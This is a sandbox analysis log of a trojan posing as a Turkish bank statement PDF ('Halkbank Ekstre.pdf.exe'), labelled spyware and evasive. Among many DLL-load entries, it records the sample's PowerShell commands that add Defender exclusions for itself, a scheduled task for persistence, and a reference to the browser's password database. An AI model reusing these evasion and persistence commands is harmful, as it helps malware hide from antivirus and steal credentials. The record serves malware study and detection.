                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, VyF3LrZTnRfCPUYiQo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, fskFMTQvUvBKdNLjaa.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, fskFMTQvUvBKdNLjaa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, fskFMTQvUvBKdNLjaa.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, fskFMTQvUvBKdNLjaa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, VyF3LrZTnRfCPUYiQo.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, VyF3LrZTnRfCPUYiQo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, VyF3LrZTnRfCPUYiQo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@4/4
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeFile created: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1824:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9D32.tmpJump to behavior
                    Source: Halkbank Ekstre.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Halkbank Ekstre.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003624000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Halkbank Ekstre.pdf.exeVirustotal: Detection: 38%
                    Source: Halkbank Ekstre.pdf.exeReversingLabs: Detection: 36%
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeFile read: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp"
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess created: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess created: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
